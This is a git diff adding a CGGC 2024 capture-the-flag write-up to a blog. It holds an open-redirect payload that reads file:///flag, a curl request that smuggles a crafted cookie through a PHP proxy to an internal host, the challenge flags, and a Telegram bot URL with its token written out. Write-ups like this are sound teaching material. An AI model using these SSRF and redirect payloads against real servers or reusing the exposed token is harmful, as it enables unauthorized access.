diff --git a/src/content/posts/cggc-2024.md b/src/content/posts/cggc-2024.md new file mode 100644 index 0000000..c552482 --- /dev/null +++ b/src/content/posts/cggc-2024.md @@ -0,0 +1,93 @@ +--- +title: ( Writeup ) CGGC 2024 +published: 2024-11-02 +description: 'CGGC 2024' +image: '' +tags: [Writeup, CTF] +category: 'WriteUps' +draft: false +--- + +## Preview Site 🔍 +> Description: This website allows you to preview this website. + +### Exploit +- Login as guest (pwd: guest) +- Go to /fetch +- Payload: `http://previewsite/logout?next=file:///flag` + +**FLAG:** +`CGGC{open_redirect_to_your_local_file_2893hrgiubf3wq1}` + +--- + +## Proxy + +> Description: Access http://secretweb/flag to get flag. + +### Source File +```php +?_-/#:.\\@'; + $fixeddomain = trim(trim($service, $filter).".cggc.chummy.tw:".$port, $filter); + $fixeddomain = idn_to_ascii($fixeddomain); + $fixeddomain = preg_replace('/[^0-9a-zA-Z-.:_]/', '', $fixeddomain); + curl_setopt($ch, CURLOPT_URL, 'http://'.$fixeddomain.$parsedUrl['path'].'?'.$_SERVER['QUERY_STRING']); + curl_exec($ch); + curl_close($ch); +} + +if (!isset($_GET['service']) && !isset($_COOKIE["service"])) { + highlight_file(__FILE__); +} else if (isset($_GET['service'])) { + proxy($_GET['service']); +} else { + proxy($_COOKIE["service"]); +} + +``` + +### Exploit +```bash= +curl --path-as-is -i -s -k -X $'GET' \ + -H $'Host: 10.99.66.6' -H $'Cache-Control: max-age=0' -H $'Accept-Language: zh-TW' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \ + -b $'service=\xfd; port=80' \ + $'http://10.99.66.6/secretweb/flag' +``` + +**FLAG:** +`CGGC{1Dn_7O_45c11_5o_57R4n9E_11fc26f06c33e83f65ade64679dc0e58}` + +--- + +## Day31- 水落石出!真相大白的十一月預告信? + +### Exploit + +- https://ithelp.ithome.com.tw/articles/10363058 +- ![image](https://hackmd.io/_uploads/SJLKkmrWkx.png) + +- 連線進入即可找到 Flag +https://api.telegram.org/bot7580842046:AAEKmOz8n3C265m2_XSv8cGFbBHg7mcnbMM/getUpdates + + +**FLAG:** +`CGGC{1_h8t3_y0u_K41d0_K4zm4}` \ No newline at end of file diff --git a/src/content/spec/about.md b/src/content/spec/about.md index 399a6eb..0a0ed0c 100644 --- a/src/content/spec/about.md +++ b/src/content/spec/about.md @@ -21,9 +21,11 @@ - (2024)AIS3 Pre-Exam rk.143 - (2024)CGGC 網路守護者挑戰賽 rk.23 -### 演講經歷 +### 講師經歷 - (2024/11/11)基礎網頁安全實務 - `臺北市立內湖高中資訊研究社/社課` +- (2024/11/30)Linux CVE 復現 + - `北臺灣學生資訊社群 CVE 漏洞實作工作坊` ### 社群活動 - SITCON 年會